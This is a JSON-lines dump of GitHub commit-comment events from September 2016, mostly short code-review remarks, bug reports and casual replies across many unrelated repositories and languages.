{"id":"4630500485","type":"CommitCommentEvent","actor":{"login":"Baldrvolsk"},"repo":{"name":"DonnEssime/Custom-Salem"},"payload":{"comment":{"id":19206841,"position":null,"line":null,"path":null,"commit_id":"7cdd70a4d00b61999f3812d9a835a6292a34dec2","created_at":"2016-09-28T13:02:03Z","updated_at":"2016-09-28T13:02:03Z","body":"Constantly client crash:\r\njava.lang.NullPointerException\r\n\tat haven.OverviewTool.shortify(OverviewTool.java:133)\r\n\tat haven.OverviewTool.update_text(OverviewTool.java:119)\r\n\tat haven.OverviewTool.tick(OverviewTool.java:154)\r\n\tat haven.Widget.tick(Widget.java:490)\r\n\tat haven.GameUI.tick(GameUI.java:697)\r\n\tat haven.Widget.tick(Widget.java:490)\r\n\tat haven.UI.tick(UI.java:160)\r\n\tat haven.HavenPanel.run(HavenPanel.java:447)\r\n\tat java.lang.Thread.run(Unknown Source)"}},"created_at":"2016-09-28T13:02:03Z"}
{"id":"4630502074","type":"CommitCommentEvent","actor":{"login":"3dever"},"repo":{"name":"CRYTEK-CRYENGINE/CRYENGINE"},"payload":{"comment":{"id":19206843,"position":null,"line":null,"path":null,"commit_id":"4d83a166502f15c5a60e1a6b7efefaecb25902d6","created_at":"2016-09-28T13:02:20Z","updated_at":"2016-09-28T13:02:20Z","body":"not completely works - foots direction is right, but look (aim) direciton is still wrong "}},"created_at":"2016-09-28T13:02:20Z"}
{"id":"4630502119","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Anatoliy88/test"},"payload":{"comment":{"id":19206844,"position":170,"line":170,"path":"app/pug/index.pug","commit_id":"c9bfe2d3fff9d68584380c28dd327861bc0d819c","created_at":"2016-09-28T13:02:21Z","updated_at":"2016-09-28T13:02:21Z","body":"зачем спаны?"}},"created_at":"2016-09-28T13:02:21Z"}
{"id":"4630506682","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Anatoliy88/test"},"payload":{"comment":{"id":19206851,"position":166,"line":166,"path":"app/pug/index.pug","commit_id":"c9bfe2d3fff9d68584380c28dd327861bc0d819c","created_at":"2016-09-28T13:03:12Z","updated_at":"2016-09-28T13:03:12Z","body":"Заголовки лучше делать заголовками"}},"created_at":"2016-09-28T13:03:12Z"}
{"id":"4630509623","type":"CommitCommentEvent","actor":{"login":"KranterFrost"},"repo":{"name":"LailaFerreira/grafos"},"payload":{"comment":{"id":19206864,"position":null,"line":null,"path":null,"commit_id":"2560ccfc1fe6ff8ec9143ad9ce3ee819c82e9207","created_at":"2016-09-28T13:03:44Z","updated_at":"2016-09-28T13:03:44Z","body":"top"}},"created_at":"2016-09-28T13:03:44Z"}
{"id":"4630510631","type":"CommitCommentEvent","actor":{"login":"lukas-h"},"repo":{"name":"tosinonikute/tosinonikute.github.io"},"payload":{"comment":{"id":19206868,"position":null,"line":null,"path":null,"commit_id":"dd902ac54649ef9d24b5451e54496c1b02d5ee3d","created_at":"2016-09-28T13:03:55Z","updated_at":"2016-09-28T13:03:55Z","body":"Can you please remove the following Part from the footer (in file _includes/footer.html):\r\n <script>\r\n  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\r\n  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\n  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');\r\n  ga('create', 'UA-72004048-3', 'auto');\r\n  ga('send', 'pageview');\r\n</script>"}},"created_at":"2016-09-28T13:03:55Z"}
{"id":"4630512290","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19206870,"position":null,"line":null,"path":null,"commit_id":"c034f6b184e9d6b79c6b217afe5e932e751464ad","created_at":"2016-09-28T13:04:13Z","updated_at":"2016-09-28T13:04:13Z","body":"moving code from helpers to model: that's a nice refactorization btw ;-) "}},"created_at":"2016-09-28T13:04:13Z"}
{"id":"4630512729","type":"CommitCommentEvent","actor":{"login":"Yajo"},"repo":{"name":"OCA/e-commerce"},"payload":{"comment":{"id":19206871,"position":null,"line":null,"path":null,"commit_id":"1a81d4eb50e45524c048c46c730764659bb71314","created_at":"2016-09-28T13:04:19Z","updated_at":"2016-09-28T13:04:19Z","body":"Maybe, but breaks the test in this one."}},"created_at":"2016-09-28T13:04:19Z"}
{"id":"4630513119","type":"CommitCommentEvent","actor":{"login":"saenzramiro"},"repo":{"name":"saenzramiro/rambox"},"payload":{"comment":{"id":19206873,"position":null,"line":null,"path":null,"commit_id":"9532a8bdfb64daec4f6232b6b3372576fed0409a","created_at":"2016-09-28T13:04:23Z","updated_at":"2016-09-28T13:04:23Z","body":"@papajon Where is that Donate button?\r\n\r\nHere's the link to donate: https://salt.bountysource.com/teams/rambox\r\n\r\nThanks!"}},"created_at":"2016-09-28T13:04:23Z"}
{"id":"4630513190","type":"CommitCommentEvent","actor":{"login":"sbalmer"},"repo":{"name":"Openki/Openki"},"payload":{"comment":{"id":19206874,"position":9,"line":9,"path":"client/lib/mediaQueryBreakpoints.js","commit_id":"6fb5130824520796923fa0814c2cf39bd6ddaf4b","created_at":"2016-09-28T13:04:23Z","updated_at":"2016-09-28T13:04:23Z","body":"I think it's alright. (`client/styles` would be the other place I can think of but nobody would be looking for it there. )"}},"created_at":"2016-09-28T13:04:23Z"}
{"id":"4630514770","type":"CommitCommentEvent","actor":{"login":"sripadma14"},"repo":{"name":"sripadma14/Hello-world-"},"payload":{"comment":{"id":19206878,"position":1,"line":1,"path":"README.md","commit_id":"d5998448b6ee82efc77121f9fef4b0a0d9394da3","created_at":"2016-09-28T13:04:41Z","updated_at":"2016-09-28T13:04:41Z","body":"aaaaaaaaaaaaaa"}},"created_at":"2016-09-28T13:04:41Z"}
{"id":"4630515167","type":"CommitCommentEvent","actor":{"login":"ashdnazg"},"repo":{"name":"spring/spring"},"payload":{"comment":{"id":19206879,"position":null,"line":null,"path":null,"commit_id":"b5474382b78bbffd2af65dcadd5274279738cf5b","created_at":"2016-09-28T13:04:46Z","updated_at":"2016-09-28T13:04:46Z","body":"well, I messed up so it only makes sense I'll fix it :)"}},"created_at":"2016-09-28T13:04:46Z"}
{"id":"4630516021","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19206882,"position":null,"line":null,"path":null,"commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:04:55Z","updated_at":"2016-09-28T13:04:55Z","body":"С семантикой пока проблемы, не требовали на предыдущей работе, подтяну, сейчас читаю: https://github.com/ademaro/frontend-tips"}},"created_at":"2016-09-28T13:04:55Z"}
{"id":"4630516045","type":"CommitCommentEvent","actor":{"login":"scoumbourdis"},"repo":{"name":"scoumbourdis/grocery-crud"},"payload":{"comment":{"id":19206883,"position":null,"line":null,"path":null,"commit_id":"f07074917df2a449e200bcc622db28944e0d8725","created_at":"2016-09-28T13:04:56Z","updated_at":"2016-09-28T13:04:56Z","body":"and... done. Commit: https://github.com/scoumbourdis/grocery-crud/commit/fbf9f8566ef719c9d269e5bb9921a907c686acc9\r\n\r\nI did implement it also for multiple relations ;-)"}},"created_at":"2016-09-28T13:04:56Z"}
{"id":"4630516689","type":"CommitCommentEvent","actor":{"login":"sripadma14"},"repo":{"name":"sripadma14/Hello-world-"},"payload":{"comment":{"id":19206886,"position":3,"line":2,"path":"README.md","commit_id":"d5998448b6ee82efc77121f9fef4b0a0d9394da3","created_at":"2016-09-28T13:05:03Z","updated_at":"2016-09-28T13:05:03Z","body":"New code added "}},"created_at":"2016-09-28T13:05:03Z"}
{"id":"4630520269","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19206896,"position":25,"line":85,"path":"CONTRIBUTING.md","commit_id":"1c0bd45eee52e53f81b49641e991f26aac76bb3b","created_at":"2016-09-28T13:05:45Z","updated_at":"2016-09-28T13:05:45Z","body":"The idea is that you can blame the piece of code you touch and get the list of relevant tags. Personally, I am thinking about dropping them altogether, because I don't get any value from the tags, and they eat the precious 50 chars limit :) "}},"created_at":"2016-09-28T13:05:45Z"}
{"id":"4630522069","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19206902,"position":null,"line":null,"path":null,"commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:06:04Z","updated_at":"2016-09-28T13:06:04Z","body":"bower_components, чтобы проще устанавливать компоненты сторонние, не знал как у вас ораганизовано все, хотя лучше было бы спросить конечно."}},"created_at":"2016-09-28T13:06:04Z"}
{"id":"4630523173","type":"CommitCommentEvent","actor":{"login":"jessicamarshall"},"repo":{"name":"Orasi/Selenium-Java-Core"},"payload":{"comment":{"id":19206905,"position":93,"line":544,"path":"src/main/java/com/orasi/utils/TestEnvironment.java","commit_id":"6657c5d10c7b0cb08c97690df229076f112dd6d8","created_at":"2016-09-28T13:06:16Z","updated_at":"2016-09-28T13:06:16Z","body":"good catch.  Adding that in.  "}},"created_at":"2016-09-28T13:06:16Z"}
{"id":"4630524536","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206907,"position":22,"line":33,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-28T13:06:31Z","updated_at":"2016-09-28T13:06:31Z","body":"Additionally, since the maximum of a 64-bit integer is 9223372036854775807 this will overflow. You should use snprintf to make sure you do not write outside the buffer (or make the buffer larger)."}},"created_at":"2016-09-28T13:06:31Z"}
{"id":"4630525214","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19206910,"position":1,"line":1,"path":"src/pug/components/seach-field.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:06:38Z","updated_at":"2016-09-28T13:06:38Z","body":"Согласен, логичнее."}},"created_at":"2016-09-28T13:06:38Z"}
{"id":"4630526904","type":"CommitCommentEvent","actor":{"login":"Fullmono"},"repo":{"name":"iRail/BeTrains-for-Android"},"payload":{"comment":{"id":19206915,"position":null,"line":null,"path":null,"commit_id":"3f9f03f71156267eaa2a44f28efd91b3431926ba","created_at":"2016-09-28T13:06:58Z","updated_at":"2016-09-28T13:06:58Z","body":"Salut, \r\nC'est Gaspard (voir G+)\r\nTu pourrais expliciter ce qui a changer dans l'encodage\r\nMes scripts utilisant l'api irail ne fonctionne plus depuis qq jours, je cherche toutes les causes possibles...\r\n\r\nMerci"}},"created_at":"2016-09-28T13:06:58Z"}
{"id":"4630528707","type":"CommitCommentEvent","actor":{"login":"portapipe"},"repo":{"name":"scoumbourdis/grocery-crud"},"payload":{"comment":{"id":19206922,"position":null,"line":null,"path":null,"commit_id":"f07074917df2a449e200bcc622db28944e0d8725","created_at":"2016-09-28T13:07:19Z","updated_at":"2016-09-28T13:07:19Z","body":"Great! Oh I almost forgot! I've created (pre-released yesterday) an App for coders, it's an alpha but I've included GC into it 😉 \r\nTry if you have time and let me know. You should suggest some cool tools :) \r\nhttps://github.com/portapipe/WolfOfDev/releases"}},"created_at":"2016-09-28T13:07:19Z"}
{"id":"4630528938","type":"CommitCommentEvent","actor":{"login":"muhammedterzi-enuygun"},"repo":{"name":"muhammedterzi-enuygun/test"},"payload":{"comment":{"id":19206923,"position":10,"line":10,"path":".idea/misc.xml","commit_id":"2393a738982094c193f214dd6388d6ae1924511d","created_at":"2016-09-28T13:07:22Z","updated_at":"2016-09-28T13:07:22Z","body":"s"}},"created_at":"2016-09-28T13:07:22Z"}
{"id":"4630530932","type":"CommitCommentEvent","actor":{"login":"caryan"},"repo":{"name":"BBN-Q/APS2-TDM-Interconnect"},"payload":{"comment":{"id":19206931,"position":4,"line":69,"path":"constraints/pins_aps2.xdc","commit_id":"e1fd5c2376bdf43f0154c1a8e69a7b03b3441edb","created_at":"2016-09-28T13:07:45Z","updated_at":"2016-09-28T13:07:45Z","body":"@grahamrow any reason you changed this?  The sata_clk is from the TDM to the APS2 so we want the DIFF_TERM on the input."}},"created_at":"2016-09-28T13:07:45Z"}
{"id":"4630531342","type":"CommitCommentEvent","actor":{"login":"muhammedterzi-enuygun"},"repo":{"name":"muhammedterzi-enuygun/test"},"payload":{"comment":{"id":19206933,"position":6,"line":6,"path":"index.php","commit_id":"2393a738982094c193f214dd6388d6ae1924511d","created_at":"2016-09-28T13:07:49Z","updated_at":"2016-09-28T13:07:49Z","body":"<h3>github</h3>"}},"created_at":"2016-09-28T13:07:49Z"}
{"id":"4630531446","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206934,"position":41,"line":41,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T13:07:50Z","updated_at":"2016-09-28T13:07:50Z","body":"Co do punktu drugiego, nie wiem o co chodzi ale `public static Main plugin;` jest źle."}},"created_at":"2016-09-28T13:07:50Z"}
{"id":"4630532455","type":"CommitCommentEvent","actor":{"login":"tosinonikute"},"repo":{"name":"tosinonikute/tosinonikute.github.io"},"payload":{"comment":{"id":19206936,"position":null,"line":null,"path":null,"commit_id":"dd902ac54649ef9d24b5451e54496c1b02d5ee3d","created_at":"2016-09-28T13:08:00Z","updated_at":"2016-09-28T13:08:00Z","body":"yes, i just removed that.\r\n\r\nSorry i didn't notice."}},"created_at":"2016-09-28T13:08:00Z"}
{"id":"4630533735","type":"CommitCommentEvent","actor":{"login":"moranpatrick"},"repo":{"name":"moranpatrick/gitTest"},"payload":{"comment":{"id":19206938,"position":null,"line":null,"path":null,"commit_id":"c56b140dca3345669ff6d934a21e541b2647474a","created_at":"2016-09-28T13:08:14Z","updated_at":"2016-09-28T13:08:14Z","body":"Let Me see some more changes! Patrick"}},"created_at":"2016-09-28T13:08:14Z"}
{"id":"4630534753","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19206939,"position":43,"line":43,"path":"src/pug/components/masonry.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:08:24Z","updated_at":"2016-09-28T13:08:24Z","body":"Полоски по бокам иконки сделал на псевдоэлементах к этому отдельному элементу, хотя да, иконку было лучше сделать псевдоэлементом."}},"created_at":"2016-09-28T13:08:24Z"}
{"id":"4630535648","type":"CommitCommentEvent","actor":{"login":"chinalichen"},"repo":{"name":"bodyno/react-starter-kit"},"payload":{"comment":{"id":19206940,"position":null,"line":null,"path":null,"commit_id":"db71f76ec05e969ccb7261f0b943f5224a6bfb90","created_at":"2016-09-28T13:08:33Z","updated_at":"2016-09-28T13:08:33Z","body":"为啥不用koa了？"}},"created_at":"2016-09-28T13:08:33Z"}
{"id":"4630535966","type":"CommitCommentEvent","actor":{"login":"Pikselke"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206941,"position":null,"line":null,"path":null,"commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T13:08:37Z","updated_at":"2016-09-28T13:08:37Z","body":"@xVacuum \r\nCały kod został poprawiony nie długo wrzuce poprawioną wersje na githuba\r\n"}},"created_at":"2016-09-28T13:08:37Z"}
{"id":"4630536388","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19206942,"position":null,"line":null,"path":null,"commit_id":"459ecde30eb679c977d7124813fccb99b5442f6a","created_at":"2016-09-28T13:08:42Z","updated_at":"2016-09-28T13:08:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1189](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14467&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T13:08:42Z"}
{"id":"4630536887","type":"CommitCommentEvent","actor":{"login":"swankjesse"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":19206944,"position":35,"line":100,"path":"okhttp-urlconnection/src/main/java/okhttp3/JavaNetCookieJar.java","commit_id":"ed43e07ffb3bb95708fe9840cf9fc2f523b2f1e5","created_at":"2016-09-28T13:08:45Z","updated_at":"2016-09-28T13:08:45Z","body":"Sure."}},"created_at":"2016-09-28T13:08:45Z"}
{"id":"4630538979","type":"CommitCommentEvent","actor":{"login":"swankjesse"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":19206951,"position":35,"line":100,"path":"okhttp-urlconnection/src/main/java/okhttp3/JavaNetCookieJar.java","commit_id":"ed43e07ffb3bb95708fe9840cf9fc2f523b2f1e5","created_at":"2016-09-28T13:09:10Z","updated_at":"2016-09-28T13:09:10Z","body":"No option is necessary, just retain the quotes & we’ll see if that’s safe."}},"created_at":"2016-09-28T13:09:10Z"}
{"id":"4630539487","type":"CommitCommentEvent","actor":{"login":"Fradou"},"repo":{"name":"WildCodeSchool/lyon_0916_jedonne2heures"},"payload":{"comment":{"id":19206952,"position":null,"line":null,"path":null,"commit_id":"893d3b907f5b00d3925550dbdd5ae19ad674d0f9","created_at":"2016-09-28T13:09:16Z","updated_at":"2016-09-28T13:09:16Z","body":"Looks good, let's go !"}},"created_at":"2016-09-28T13:09:16Z"}
{"id":"4630540735","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206955,"position":17,"line":17,"path":"src/pl/pikselke/mchw/craftings/CraftingInventory1.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T13:09:30Z","updated_at":"2016-09-28T13:09:30Z","body":"I niech nie tworzy za każdym razem nowego ekwipunku bo nie widzę w tym przypadku takiego sensu, itemy nie są zmieniane co otworzenie, prawda? Są takie same dla każdego gracza."}},"created_at":"2016-09-28T13:09:30Z"}
{"id":"4630543259","type":"CommitCommentEvent","actor":{"login":"kungfujam"},"repo":{"name":"agamemnonc/iaml"},"payload":{"comment":{"id":19206962,"position":null,"line":null,"path":null,"commit_id":"390a784f989829e672acb2bee229aa28c2e03cb8","created_at":"2016-09-28T13:09:57Z","updated_at":"2016-09-28T13:09:57Z","body":"...oops...my bad! Thanks for fixing. Goddamn immutable types! Good question on Piazza about this https://piazza.com/class/it4glxodpw62do?cid=6"}},"created_at":"2016-09-28T13:09:57Z"}
{"id":"4630544159","type":"CommitCommentEvent","actor":{"login":"Areii1"},"repo":{"name":"Areii1/matrix_calculator"},"payload":{"comment":{"id":19206964,"position":null,"line":null,"path":null,"commit_id":"edcd098ae3a2ba8fe4b2c14b3a87e2cb4215b5bb","created_at":"2016-09-28T13:10:08Z","updated_at":"2016-09-28T13:10:08Z","body":"Joo koitan tehä noita matriisilaskui koodille."}},"created_at":"2016-09-28T13:10:08Z"}
{"id":"4630545432","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206968,"position":18,"line":18,"path":"src/pl/pikselke/mchw/listeners/PlayerInteractWorkBeanch.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T13:10:21Z","updated_at":"2016-09-28T13:10:21Z","body":"Owszem, `static` rzeczywiscie trochę tutaj nie jest na miejscu. A `@EventHandler`a nie zauważyłem :D"}},"created_at":"2016-09-28T13:10:21Z"}
{"id":"4630549814","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206974,"position":11,"line":11,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuit.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T13:11:09Z","updated_at":"2016-09-28T13:11:09Z","body":"I te `weszedł` + `§` nie wiadomo dlaczego ;_____; \r\n\r\n`ChatColor.translateAlternateColorCodes()` cię uratuje!"}},"created_at":"2016-09-28T13:11:09Z"}
{"id":"4630549822","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19206975,"position":null,"line":null,"path":null,"commit_id":"fc8e29bf35680cdd96a21f636f9b5be3b78038a7","created_at":"2016-09-28T13:11:09Z","updated_at":"2016-09-28T13:11:09Z","body":"Would it be possible to also show a list with available login shells?"}},"created_at":"2016-09-28T13:11:09Z"}
{"id":"4630551259","type":"CommitCommentEvent","actor":{"login":"Kmetj"},"repo":{"name":"Kmetj/JK"},"payload":{"comment":{"id":19206978,"position":null,"line":null,"path":null,"commit_id":"629ffe91da9945b7cf28200af3b9afb55c5fed87","created_at":"2016-09-28T13:11:25Z","updated_at":"2016-09-28T13:11:25Z","body":"ôaôaôa"}},"created_at":"2016-09-28T13:11:25Z"}
{"id":"4630552280","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206980,"position":171,"line":331,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T13:11:35Z","updated_at":"2016-09-28T13:11:35Z","body":"Commented code."}},"created_at":"2016-09-28T13:11:35Z"}
{"id":"4630553443","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206984,"position":170,"line":330,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T13:11:49Z","updated_at":"2016-09-28T13:11:49Z","body":"Still to do?"}},"created_at":"2016-09-28T13:11:49Z"}
{"id":"4630558503","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19206990,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T13:12:45Z","updated_at":"2016-09-28T13:12:45Z","body":"> .default-decoration should not be ignored in metacity, is it?\r\n\r\nHopefully right. Adwaita stopped adding window-manager specific theming already though, but we need.\r\n\r\n> Any reason why you use it for other things? Do you want that decorations looks different between csd and\r\nssd windows?\r\n\r\nYes. I need the different button images, spacings, shadows, and borders...\r\nBecause SSDs window-frames only contain `.title` and `.titlebutton`, so we can save the vertical spacing with tiny titlebutton images like I've done.\r\n\r\n> CSS nodes and classes in Metacity:\r\nwindow.background.csd\r\n+ decoration\r\n+ headerbar.titlebar.horizontal.default-decoration\r\n++ label.title\r\n++ button.titlebutton\r\n+++ image\r\n\r\nThanks for your info. I think you'd better to do documenting them, or already done?\r\n\r\nRegards.\r\n\r\n"}},"created_at":"2016-09-28T13:12:45Z"}
{"id":"4630559913","type":"CommitCommentEvent","actor":{"login":"PhilippSpo"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":19206991,"position":27,"line":27,"path":"src/sync/customers-actions.js","commit_id":"0b515df057f8a25934e4566020d2913158b4017b","created_at":"2016-09-28T13:13:00Z","updated_at":"2016-09-28T13:13:00Z","body":"```js\r\nconst actions = actionsBaseList().map((item) =>\r\n  buildBaseAttributesAction(\r\n    item, diff, oldObj, newObj, diffpatcher.patch\r\n  )\r\n).filter(action => action)\r\n```"}},"created_at":"2016-09-28T13:13:00Z"}
{"id":"4630560086","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Anatoliy88/test"},"payload":{"comment":{"id":19206993,"position":180,"line":180,"path":"app/pug/index.pug","commit_id":"c9bfe2d3fff9d68584380c28dd327861bc0d819c","created_at":"2016-09-28T13:13:01Z","updated_at":"2016-09-28T13:13:01Z","body":"два элемента на одном уровне? page-footer__item-2 зачем? col.col-3 миксование на уровне препроцессоров, а не вынос этих блоков в разметку"}},"created_at":"2016-09-28T13:13:01Z"}
{"id":"4630560277","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19206994,"position":40,"line":40,"path":"src/pug/components/masonry.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:13:03Z","updated_at":"2016-09-28T13:13:03Z","body":"Картинка не обязательна, если убрать вертка не сломается, хотя фон уже не тот будет конечно. Нужно модификатор сделать, чтобы для твита фон темнее поставить. Или если в других элементах на фоне везде картинка, то стоит поменять стандартный фон для блоков, чтобы для твита отдельный модификатор нет делать."}},"created_at":"2016-09-28T13:13:03Z"}
{"id":"4630565422","type":"CommitCommentEvent","actor":{"login":"lukas-h"},"repo":{"name":"tosinonikute/tosinonikute.github.io"},"payload":{"comment":{"id":19207005,"position":null,"line":null,"path":null,"commit_id":"dd902ac54649ef9d24b5451e54496c1b02d5ee3d","created_at":"2016-09-28T13:13:59Z","updated_at":"2016-09-28T13:13:59Z","body":"Thank you. Have fun with the theme :+1: "}},"created_at":"2016-09-28T13:13:59Z"}
{"id":"4630566237","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Anatoliy88/test"},"payload":{"comment":{"id":19207009,"position":218,"line":218,"path":"app/pug/index.pug","commit_id":"c9bfe2d3fff9d68584380c28dd327861bc0d819c","created_at":"2016-09-28T13:14:08Z","updated_at":"2016-09-28T13:14:08Z","body":"для чего модернайзр?"}},"created_at":"2016-09-28T13:14:08Z"}
{"id":"4630566283","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19207010,"position":59,"line":16,"path":"src/window_draw.py","commit_id":"eab1ee2134ca94cac4e349f71fa5c3dff54a6054","created_at":"2016-09-28T13:14:09Z","updated_at":"2016-09-28T13:14:09Z","body":"We want to separate the input strings as line breaks in our output. Also, make sure to filter out empty strings (e.g. If an input string has multiple adjacent spaces)"}},"created_at":"2016-09-28T13:14:09Z"}
{"id":"4630568563","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19207017,"position":19,"line":3,"path":"intersect.js","commit_id":"b2b0280669181967b64497a9da5ed5bf8af10dc6","created_at":"2016-09-28T13:14:33Z","updated_at":"2016-09-28T13:14:33Z","body":"Для описания функций лучше использовать комменты в стиле jsdoc."}},"created_at":"2016-09-28T13:14:33Z"}
{"id":"4630569804","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19207020,"position":null,"line":null,"path":null,"commit_id":"b80d7ec4a75f53b41271fd9ed525383a5fbfe42a","created_at":"2016-09-28T13:14:46Z","updated_at":"2016-09-28T13:14:46Z","body":"This commit is also missing adding /src/hyperstart to the .gitignore file"}},"created_at":"2016-09-28T13:14:46Z"}
{"id":"4630572395","type":"CommitCommentEvent","actor":{"login":"csguth"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19207028,"position":24,"line":21,"path":"ophidian/parser/LibertyParser.cpp","commit_id":"9bb6cf2e71d85928015fc00d607e01c78446f05b","created_at":"2016-09-28T13:15:14Z","updated_at":"2016-09-28T13:15:14Z","body":"Pls, check if you need to `si2drPIQuit()`. If you need to call `si2drPIQuit()`, it should be in `LibertyParser::~Pimpl()`.\r\nIf you can't call `LibertyParser::readFile()` twice (e.g., reading early and late libs using the same parser), I think `si2drPIInit()` and `si2drPIQuit()` must be called inside `LibertyParser::readFile()`. "}},"created_at":"2016-09-28T13:15:14Z"}
{"id":"4630572915","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19207030,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T13:15:19Z","updated_at":"2016-09-28T13:15:19Z","body":">  Sounds like Mutter and Metacity should support margins on buttons...\r\n\r\nYeah that is the lack I really needed.\r\n\r\nRegards."}},"created_at":"2016-09-28T13:15:19Z"}
{"id":"4630573334","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Anatoliy88/test"},"payload":{"comment":{"id":19207031,"position":35,"line":35,"path":"app/pug/index.pug","commit_id":"c9bfe2d3fff9d68584380c28dd327861bc0d819c","created_at":"2016-09-28T13:15:23Z","updated_at":"2016-09-28T13:15:23Z","body":"у нас БЭМ или нет?"}},"created_at":"2016-09-28T13:15:23Z"}
{"id":"4630573989","type":"CommitCommentEvent","actor":{"login":"vladyan"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19207032,"position":3,"line":3,"path":"src/pug/components/footer.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T13:15:30Z","updated_at":"2016-09-28T13:15:30Z","body":"По семантике ниже комментарий оставил. С этим согласен, нужно почитать про симантику. Не хотел мало понимая навтыкать тегов там где они не уместны."}},"created_at":"2016-09-28T13:15:30Z"}
{"id":"4630574958","type":"CommitCommentEvent","actor":{"login":"PhilippSpo"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":19207036,"position":42,"line":42,"path":"src/sync/customers-actions.js","commit_id":"0b515df057f8a25934e4566020d2913158b4017b","created_at":"2016-09-28T13:15:41Z","updated_at":"2016-09-28T13:15:41Z","body":"I think this should not be handled in the SDK. Could you alternatively just check if the id is the only diff?"}},"created_at":"2016-09-28T13:15:41Z"}
